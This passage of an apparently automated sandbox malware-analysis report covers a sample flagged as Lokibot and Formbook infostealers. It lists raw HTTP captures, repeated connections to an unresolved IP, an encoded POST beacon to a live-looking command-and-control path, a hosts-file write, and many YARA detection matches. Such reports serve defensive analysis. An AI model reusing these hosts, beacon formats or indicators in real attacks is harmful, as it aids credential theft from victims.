b8 56 1b 40 da 23 39 05 4b 1a 9a 58 19 14 ba 95 2c 62 55 95 0d 5d ae f8 f5 d7 46 0f 17 f7 da d6 dc c2 b2 6d db 6d 37 65 77 52 9e 6e d2 66 db ea cc 85 9c 54 7a f2 a2 aa aa 6a 82 7d 0f 3a 13 bf 97 ca 1e fe da 84 48 80 39 90 9e 00 fe 85 1a e6 f2 4e 1a 69 9a 75 5c 14 1b e8 d1 eb 88 8f 73 84 76 0b 59 9c a6 e9 36 69 3b 47 1b 0f e7 f5 5d 10 2c 66 3c 87 fe 01 e7 cb b4 da c0 d7 5f f3 6f 74 f2 25 a3 7a 60 20 3b 5a af 84 21 ed 7d de 19 5b 4b 23 e6 47 a9 ad 3a de 23 e4 30 12 32 bb 1f c3 02 91 54 4e 42 66 46 75 aa 40 4b fa 90 fe d6 dd d7 a3 39 ca 81 d4 66 d2 7e 4f 3a 27 8f 02 2d 65 5d 97 4d ea 65 ed c3 5e 07 10 68 d9 ae 2c c8 7e 05 46 69 80 8c 7a b8 10 68 d9 6e 4a 25 37 6e bf 02 97 fa 52
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closeexpires: Wed, 11 Jan 1984 05:00:00 GMTcache-control: no-cache, must-revalidate, max-age=0content-type: text/html; charset=UTF-8link: <http://yektakhodro.com/wp-json/>; rel="https://api.w.org/"transfer-encoding: chunkedcontent-encoding: brvary: Accept-Encodingdate: Thu, 26 Oct 2023 07:47:48 GMTData Raw: 39 35 62 0d 0a 70 dc 02 80 fc af 6a 3a 9f 96 09 39 3d 5b a2 03 90 00 58 44 42 b6 d2 a6 56 d6 0a 12 9f 14 72 20 c1 00 e0 89 72 9f d2 97 bd 34 d7 39 cb ac 3b 6f f1 ff db ef 7f fd 43 ec 84 22 1a 12 89 d5 69 92 c6 50 91 99 b3 47 de 7b 5f cc 2e 66 1a 22 25 bb 77 ab 94 70 09 8d 48 89 d8 18 cb fd af 72 88 48 a9 2b 6b 36 3d 01 1b ed 16 b7 f7 a1 37 68 9a 4a 27 b8 60 e4 1d 6d 25 79 f7 b3 a1 1d cc 36 17 37 6e f6 d2 79 08 77 ce c7 01 9f bc 63 78 cf 46 67 5b 6d a0 ba e1 73 f4 22 49 ba 7e ec 62 eb ba 64 6e 87 84 31 8f bb d2 43 57 cb e6 62 fb 12 22 49 8e 70 11 e4 c5 de 2a 67 67 d4 ff 7e e6 de b8 b1 89 c7 fd 78 be 5b 2c ce ce ce 6e fb 31 eb 27 ed e6 71 fe fc 1f 7e fe ee 30 4e e1 43 08 7b ab 46 59 7f bd 39 a0 9b 37 91 b2 cd d4 c3 10 e2 37 b5 3f b4 0a be 5c fe e0 74 80 f5 8a 66 0a d4 0c 3f 62 a4 c4 61 24 a3 c3 97 2a fc 6b 38 58 ab 7a e9 42 f2 ad 4f 8c ae 7d a2 81 b1 77 26 1f 6c ff 89 b3 23 b8 a0 c1 0f b1 3c fc 8b 84 f3 a4 d5 10 1e 23 16 67 49 e5 fb 38 fd 7e 7a 76 fd e4 ea 07 74 f5 df ab 5f 4f 4f 4e bf a1 ab ef 4f 2f 4f 4f d0 cd 65 c9 19 db a2 57 bf 5e ff f1 f7 0c 4c f8 f7 ea c7 86 17 b5 36 dd cc 1a b4 83 ac 9c ad 6d f0 ab 81 43 4a ac 06 fb 5f 02 cc c0 68 b0 4d e0 45 56 28 d9 2d 62 22 b2 52 83 27 f3 a0 3f 2d 34 fb 55 1c a6 5e 9d 28 8f 19 38 57 b1 dd 6d 64 d0 76 48 54 0d b0 3f 10 b5 63 d7 17 85 68 5b 9e 9d 7e bb fe 43 11 fe db 2d 80 4a ce 39 f9 a6 a0 d3 93 57 bf 9e 9e 5c 3f 39 fd 76 f5 c3 ff 8f 7f bd fa e1 f4 9b 8a ca e4 86 d9 7c 70 2b 1f 8e 06 fc 1e 20 ac 90 56 77 56 87 91 d4 c6 36 17 c4 e8 da 49 77 24 2e 18 d2 78 2f 7d 1b 11 4c 38 8c c4 70 3c 62 d2 78 9f 28 ed 43 42 4c 9b 9e dd a9 c4 05 a3 77 57 69 bc 7f e3 12 dc 9d 22 4e 63 be 8a a8 a5 56 01 e6 90 00 1a b3 22 b9 4d 2b 69 cc 8a e9 96 cd 59 3c b9 84 41 59 e7 09 98 fb 5d 26 1b 69 83 c7 1e ac 15 d9 0c d7 40 d2 15 34 be 10 70 03 92 b6 0c 32 92 c0 ab f0 fd 13 65 5c 2d 06 78 01 fe 41 61 53 d0 5e c3 c5 84 c1 c2 a1 cf f6 e7 58 dd 10 cb c4 e3 27 b7 27 6d cb b2 f0 50 e4 16 ee 16 c9 ad d7 1a 00 79 b8 56 1b 40 da 23 39 05 4b 1a 9a 58 19 14 ba 95 2c 62 55 95 0d 5d ae f8 f5 d7 46 0f 17 f7 da d6 dc c2 b2 6d db 6d 37 65 77 52 9e 6e d2 66 db ea cc 85 9c 54 7a f2 a2 aa aa 6a 82 7d 0f 3a 13 bf 97 ca 1e fe da 84 48 80 39 90 9e 00 fe 85 1a e6 f2 4e 1a 69 9a 75 5c 14 1b e8 d1 eb 88 8f 73 84 76 0b 59 9c a6 e9 36 69 3b 47 1b 0f e7 f5 5d 10 2c 66 3c 87 fe 01 e7 cb b4 da c0 d7 5f f3 6f 74 f2 25 a3 7a 60 20 3b 5a af 84 21 ed 7d de 19 5b 4b 23 e6 47 a9 ad 3a de 23 e4 30 12 32 bb 1f c3 02 91 54 4e 42 66 46 75 aa 40 4b fa 90 fe d6 dd d7 a3 39 ca 81 d4 66 d2 7e 4f 3a 27 8f 02 2d 65 5d 97 4d ea 65 ed c3 5e 07 10 68 d9 ae 2c c8 7e 05 46 69 80 8c 7a b8 10 68 d9 6e 4a 25 37 6e bf 02 97 fa 52
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closeexpires: Wed, 11 Jan 1984 05:00:00 GMTcache-control: no-cache, must-revalidate, max-age=0content-type: text/html; charset=UTF-8link: <http://yektakhodro.com/wp-json/>; rel="https://api.w.org/"transfer-encoding: chunkedcontent-encoding: brvary: Accept-Encodingdate: Thu, 26 Oct 2023 07:47:51 GMTData Raw: 39 35 62 0d 0a 70 dc 02 80 fc af 6a 3a 9f 96 09 39 3d 5b a2 03 90 00 58 44 42 b6 d2 a6 56 d6 0a 12 9f 14 72 20 c1 00 e0 89 72 9f d2 97 bd 34 d7 39 cb ac 3b 6f f1 ff db ef 7f fd 43 ec 84 22 1a 12 89 d5 69 92 c6 50 91 99 b3 47 de 7b 5f cc 2e 66 1a 22 25 bb 77 ab 94 70 09 8d 48 89 d8 18 cb fd af 72 88 48 a9 2b 6b 36 3d 01 1b ed 16 b7 f7 a1 37 68 9a 4a 27 b8 60 e4 1d 6d 25 79 f7 b3 a1 1d cc 36 17 37 6e f6 d2 79 08 77 ce c7 01 9f bc 63 78 cf 46 67 5b 6d a0 ba e1 73 f4 22 49 ba 7e ec 62 eb ba 64 6e 87 84 31 8f bb d2 43 57 cb e6 62 fb 12 22 49 8e 70 11 e4 c5 de 2a 67 67 d4 ff 7e e6 de b8 b1 89 c7 fd 78 be 5b 2c ce ce ce 6e fb 31 eb 27 ed e6 71 fe fc 1f 7e fe ee 30 4e e1 43 08 7b ab 46 59 7f bd 39 a0 9b 37 91 b2 cd d4 c3 10 e2 37 b5 3f b4 0a be 5c fe e0 74 80 f5 8a 66 0a d4 0c 3f 62 a4 c4 61 24 a3 c3 97 2a fc 6b 38 58 ab 7a e9 42 f2 ad 4f 8c ae 7d a2 81 b1 77 26 1f 6c ff 89 b3 23 b8 a0 c1 0f b1 3c fc 8b 84 f3 a4 d5 10 1e 23 16 67 49 e5 fb 38 fd 7e 7a 76 fd e4 ea 07 74 f5 df ab 5f 4f 4f 4e bf a1 ab ef 4f 2f 4f 4f d0 cd 65 c9 19 db a2 57 bf 5e ff f1 f7 0c 4c f8 f7 ea c7 86 17 b5 36 dd cc 1a b4 83 ac 9c ad 6d f0 ab 81 43 4a ac 06 fb 5f 02 cc c0 68 b0 4d e0 45 56 28 d9 2d 62 22 b2 52 83 27 f3 a0 3f 2d 34 fb 55 1c a6 5e 9d 28 8f 19 38 57 b1 dd 6d 64 d0 76 48 54 0d b0 3f 10 b5 63 d7 17 85 68 5b 9e 9d 7e bb fe 43 11 fe db 2d 80 4a ce 39 f9 a6 a0 d3 93 57 bf 9e 9e 5c 3f 39 fd 76 f5 c3 ff 8f 7f bd fa e1 f4 9b 8a ca e4 86 d9 7c 70 2b 1f 8e 06 fc 1e 20 ac 90 56 77 56 87 91 d4 c6 36 17 c4 e8 da 49 77 24 2e 18 d2 78 2f 7d 1b 11 4c 38 8c c4 70 3c 62 d2 78 9f 28 ed 43 42 4c 9b 9e dd a9 c4 05 a3 77 57 69 bc 7f e3 12 dc 9d 22 4e 63 be 8a a8 a5 56 01 e6 90 00 1a b3 22 b9 4d 2b 69 cc 8a e9 96 cd 59 3c b9 84 41 59 e7 09 98 fb 5d 26 1b 69 83 c7 1e ac 15 d9 0c d7 40 d2 15 34 be 10 70 03 92 b6 0c 32 92 c0 ab f0 fd 13 65 5c 2d 06 78 01 fe 41 61 53 d0 5e c3 c5 84 c1 c2 a1 cf f6 e7 58 dd 10 cb c4 e3 27 b7 27 6d cb b2 f0 50 e4 16 ee 16 c9 ad d7 1a 00 79 b8 56 1b 40 da 23 39 05 4b 1a 9a 58 19 14 ba 95 2c 62 55 95 0d 5d ae f8 f5 d7 46 0f 17 f7 da d6 dc c2 b2 6d db 6d 37 65 77 52 9e 6e d2 66 db ea cc 85 9c 54 7a f2 a2 aa aa 6a 82 7d 0f 3a 13 bf 97 ca 1e fe da 84 48 80 39 90 9e 00 fe 85 1a e6 f2 4e 1a 69 9a 75 5c 14 1b e8 d1 eb 88 8f 73 84 76 0b 59 9c a6 e9 36 69 3b 47 1b 0f e7 f5 5d 10 2c 66 3c 87 fe 01 e7 cb b4 da c0 d7 5f f3 6f 74 f2 25 a3 7a 60 20 3b 5a af 84 21 ed 7d de 19 5b 4b 23 e6 47 a9 ad 3a de 23 e4 30 12 32 bb 1f c3 02 91 54 4e 42 66 46 75 aa 40 4b fa 90 fe d6 dd d7 a3 39 ca 81 d4 66 d2 7e 4f 3a 27 8f 02 2d 65 5d 97 4d ea 65 ed c3 5e 07 10 68 d9 ae 2c c8 7e 05 46 69 80 8c 7a b8 10 68 d9 6e 4a 25 37 6e bf 02 97 fa 52
                    Source: unknownTCP traffic detected without corresponding DNS query: 172.245.208.6
                    Source: unknownTCP traffic detected without corresponding DNS query: 172.245.208.6
                    Source: unknownTCP traffic detected without corresponding DNS query: 172.245.208.6
                    Source: unknownTCP traffic detected without corresponding DNS query: 172.245.208.6
                    Source: unknownTCP traffic detected without corresponding DNS query: 172.245.208.6
                    Source: unknownTCP traffic detected without corresponding DNS query: 172.245.208.6
                    Source: unknownTCP traffic detected without corresponding DNS query: 172.245.208.6
                    Source: unknownTCP traffic detected without corresponding DNS query: 172.245.208.6
                    Source: unknownTCP traffic detected without corresponding DNS query: 172.245.208.6
                    Source: unknownTCP traffic detected without corresponding DNS query: 172.245.208.6
                    Source: unknownTCP traffic detected without corresponding DNS query: 172.245.208.6
                    Source: unknownTCP traffic detected without corresponding DNS query: 172.245.208.6
                    Source: unknownTCP traffic detected without corresponding DNS query: 172.245.208.6
                    Source: unknownTCP traffic detected without corresponding DNS query: 172.245.208.6
                    Source: unknownTCP traffic detected without corresponding DNS query: 172.245.208.6
                    Source: unknownTCP traffic detected without corresponding DNS query: 172.245.208.6
                    Source: unknownTCP traffic detected without corresponding DNS query: 172.245.208.6
                    Source: unknownTCP traffic detected without corresponding DNS query: 172.245.208.6
                    Source: unknownTCP traffic detected without corresponding DNS query: 172.245.208.6
                    Source: unknownTCP traffic detected without corresponding DNS query: 172.245.208.6
                    Source: unknownTCP traffic detected without corresponding DNS query: 172.245.208.6
                    Source: unknownTCP traffic detected without corresponding DNS query: 172.245.208.6
                    Source: unknownTCP traffic detected without corresponding DNS query: 172.245.208.6
                    Source: unknownTCP traffic detected without corresponding DNS query: 172.245.208.6
                    Source: unknownTCP traffic detected without corresponding DNS query: 172.245.208.6
                    Source: unknownTCP traffic detected without corresponding DNS query: 172.245.208.6
                    Source: unknownTCP traffic detected without corresponding DNS query: 172.245.208.6
                    Source: unknownTCP traffic detected without corresponding DNS query: 172.245.208.6
                    Source: unknownTCP traffic detected without corresponding DNS query: 172.245.208.6
                    Source: unknownTCP traffic detected without corresponding DNS query: 172.245.208.6
                    Source: unknownTCP traffic detected without corresponding DNS query: 172.245.208.6
                    Source: unknownTCP traffic detected without corresponding DNS query: 172.245.208.6
                    Source: unknownTCP traffic detected without corresponding DNS query: 172.245.208.6
                    Source: unknownTCP traffic detected without corresponding DNS query: 172.245.208.6
                    Source: unknownTCP traffic detected without corresponding DNS query: 172.245.208.6
                    Source: unknownTCP traffic detected without corresponding DNS query: 172.245.208.6
                    Source: unknownTCP traffic detected without corresponding DNS query: 172.245.208.6
                    Source: unknownTCP traffic detected without corresponding DNS query: 172.245.208.6
                    Source: unknownTCP traffic detected without corresponding DNS query: 172.245.208.6
                    Source: unknownTCP traffic detected without corresponding DNS query: 172.245.208.6
                    Source: unknownTCP traffic detected without corresponding DNS query: 172.245.208.6
                    Source: unknownTCP traffic detected without corresponding DNS query: 172.245.208.6
                    Source: unknownTCP traffic detected without corresponding DNS query: 172.245.208.6
                    Source: unknownTCP traffic detected without corresponding DNS query: 172.245.208.6
                    Source: unknownTCP traffic detected without corresponding DNS query: 172.245.208.6
                    Source: unknownTCP traffic detected without corresponding DNS query: 172.245.208.6
                    Source: unknownTCP traffic detected without corresponding DNS query: 172.245.208.6
                    Source: unknownTCP traffic detected without corresponding DNS query: 172.245.208.6
                    Source: unknownTCP traffic detected without corresponding DNS query: 172.245.208.6
                    Source: unknownTCP traffic detected without corresponding DNS query: 172.245.208.6
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033B1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: Policy: default-src 'self' https://fonts.gstatic.com:443 https://region1.google-analytics.com:443 data:; style-src 'self' 'unsafe-inline' https://www.gstatic.com:443 https://fonts.googleapis.com:443; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://www.gstatic.com:443 https://www.google.com/recaptcha/ https://www.googletagmanager.com:443; frame-src https://www.google.com/recaptcha/; img-src 'self' data: https://syndication.twitter.com:443; object-src 'none' equals www.twitter.com (Twitter)
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: default-src 'self' https://fonts.gstatic.com:443 https://region1.google-analytics.com:443 data:; style-src 'self' 'unsafe-inline' https://www.gstatic.com:443 https://fonts.googleapis.com:443; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://www.gstatic.com:443 https://www.google.com/recaptcha/ https://www.googletagmanager.com:443; frame-src https://www.google.com/recaptcha/; img-src 'self' data: https://syndication.twitter.com:443; object-src 'none' equals www.twitter.com (Twitter)
                    Source: unknownHTTP traffic detected: POST /oqhk/ HTTP/1.1Host: www.bradslinkard.comAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Origin: http://www.bradslinkard.comContent-Type: application/x-www-form-urlencodedContent-Length: 187Connection: closeCache-Control: max-age=0Referer: http://www.bradslinkard.com/oqhk/User-Agent: Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)Data Raw: 36 56 3d 41 36 47 38 65 4e 4d 59 75 47 35 52 38 38 79 59 57 67 65 77 51 51 66 38 32 36 7a 64 54 64 64 6c 4c 53 62 54 50 63 34 52 74 4d 77 47 69 38 67 58 71 32 71 61 5a 4e 4b 79 30 71 59 45 77 4b 31 6f 47 6b 6e 78 36 32 72 51 62 6e 58 49 34 74 42 4d 6b 35 6a 53 77 6a 50 76 45 4a 68 45 72 75 39 7a 59 78 51 46 30 6e 59 30 6a 6e 53 36 36 4a 4b 54 56 52 4f 56 57 49 6a 61 68 2f 49 56 49 54 4b 79 64 45 74 6c 36 4f 39 4f 69 65 6e 4f 66 37 68 4e 42 5a 5a 47 67 4f 79 68 52 79 34 6a 62 38 5a 78 66 5a 7a 5a 37 73 70 77 30 64 38 6c 67 59 7a 78 37 77 7a 61 39 49 55 3d Data Ascii: 6V=A6G8eNMYuG5R88yYWgewQQf826zdTddlLSbTPc4RtMwGi8gXq2qaZNKy0qYEwK1oGknx62rQbnXI4tBMk5jSwjPvEJhEru9zYxQF0nY0jnS66JKTVROVWIjah/IVITKydEtl6O9OienOf7hNBZZGgOyhRy4jb8ZxfZzZ7spw0d8lgYzx7wza9IU=

                    E-Banking Fraud

                    barindex
                    Source: Yara matchFile source: 16.2.pznhcda.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 15.2.pznhcda.exe.910000.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 8.2.audiodgse.exe.400000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 15.2.pznhcda.exe.910000.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 9.2.sbinzx.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 9.2.sbinzx.exe.400000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 8.2.audiodgse.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 16.2.pznhcda.exe.400000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000010.00000002.1373397267.00000000009B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000001D.00000002.2486958319.0000000004460000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000001D.00000002.2475448854.0000000002560000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000017.00000002.2485022491.00000000044B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000008.00000002.1375358332.0000000002B70000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000010.00000002.1378872385.0000000000D30000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000017.00000002.2485599667.00000000044E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000014.00000002.2491293063.0000000004D90000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000014.00000002.2475106067.0000000003000000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000025.00000002.2495734545.0000000004EC0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000014.00000002.2489028637.00000000033E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000001D.00000002.2487485733.0000000004490000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000009.00000002.1370772038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000017.00000002.2475619657.00000000028D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000010.00000002.1368928520.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000008.00000002.1369508767.0000000000D50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000F.00000002.1299234736.0000000000910000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000005.00000002.1287513905.0000000003AEE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000008.00000002.1368570053.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000E.00000002.2490251590.0000000003E00000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

                    Spam, unwanted Advertisements and Ransom Demands

                    barindex
                    Source: C:\Users\user\Desktop\a\setup.exeFile written: C:\Windows\System32\drivers\etc\hosts

                    System Summary

                    barindex
                    Source: dump.pcap, type: PCAPMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
                    Source: dump.pcap, type: PCAPMatched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
                    Source: dump.pcap, type: PCAPMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                    Source: 16.2.pznhcda.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
                    Source: 16.2.pznhcda.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
                    Source: 16.2.pznhcda.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
                    Source: 15.2.pznhcda.exe.910000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
                    Source: 15.2.pznhcda.exe.910000.1.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
                    Source: 15.2.pznhcda.exe.910000.1.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
                    Source: 8.2.audiodgse.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
                    Source: 15.2.pznhcda.exe.910000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
                    Source: 15.2.pznhcda.exe.910000.1.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
                    Source: 15.2.pznhcda.exe.910000.1.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
                    Source: 9.2.sbinzx.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
                    Source: 9.2.sbinzx.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
                    Source: 9.2.sbinzx.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
                    Source: 9.2.sbinzx.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
                    Source: 9.2.sbinzx.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
                    Source: 9.2.sbinzx.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
                    Source: 8.2.audiodgse.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
                    Source: 16.2.pznhcda.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
                    Source: 16.2.pznhcda.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
                    Source: 16.2.pznhcda.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
                    Source: 0.2.New_Text_Document.exe.347db3e.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
                    Source: 0.2.New_Text_Document.exe.347db3e.2.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
                    Source: 0.2.New_Text_Document.exe.347db3e.2.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                    Source: 0.2.New_Text_Document.exe.347db3e.2.unpack, type: UNPACKEDPEMatched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
                    Source: 00000010.00000002.1373397267.00000000009B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
                    Source: 00000010.00000002.1373397267.00000000009B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
                    Source: 00000010.00000002.1373397267.00000000009B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
                    Source: 0000001D.00000002.2486958319.0000000004460000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
                    Source: 0000001D.00000002.2486958319.0000000004460000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
                    Source: 0000001D.00000002.2486958319.0000000004460000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
                    Source: 0000001D.00000002.2475448854.0000000002560000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
                    Source: 0000001D.00000002.2475448854.0000000002560000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
                    Source: 0000001D.00000002.2475448854.0000000002560000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
                    Source: 00000017.00000002.2485022491.00000000044B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
                    Source: 00000017.00000002.2485022491.00000000044B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
                    Source: 00000017.00000002.2485022491.00000000044B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
                    Source: 00000008.00000002.1375358332.0000000002B70000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
                    Source: 00000010.00000002.1378872385.0000000000D30000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
                    Source: 00000010.00000002.1378872385.0000000000D30000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
                    Source: 00000010.00000002.1378872385.0000000000D30000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
                    Source: 00000017.00000002.2485599667.00000000044E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
                    Source: 00000017.00000002.2485599667.00000000044E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
                    Source: 00000017.00000002.2485599667.00000000044E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
                    Source: 00000014.00000002.2491293063.0000000004D90000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
                    Source: 00000014.00000002.2475106067.0000000003000000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
                    Source: 00000025.00000002.2495734545.0000000004EC0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
                    Source: 00000014.00000002.2489028637.00000000033E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
                    Source: 00000000.00000002.2491308945.0000000003621000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
                    Source: 00000000.00000002.2491308945.0000000003621000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                    Source: 0000001D.00000002.2487485733.0000000004490000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
                    Source: 0000001D.00000002.2487485733.0000000004490000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
                    Source: 0000001D.00000002.2487485733.0000000004490000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
                    Source: 00000009.00000002.1370772038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
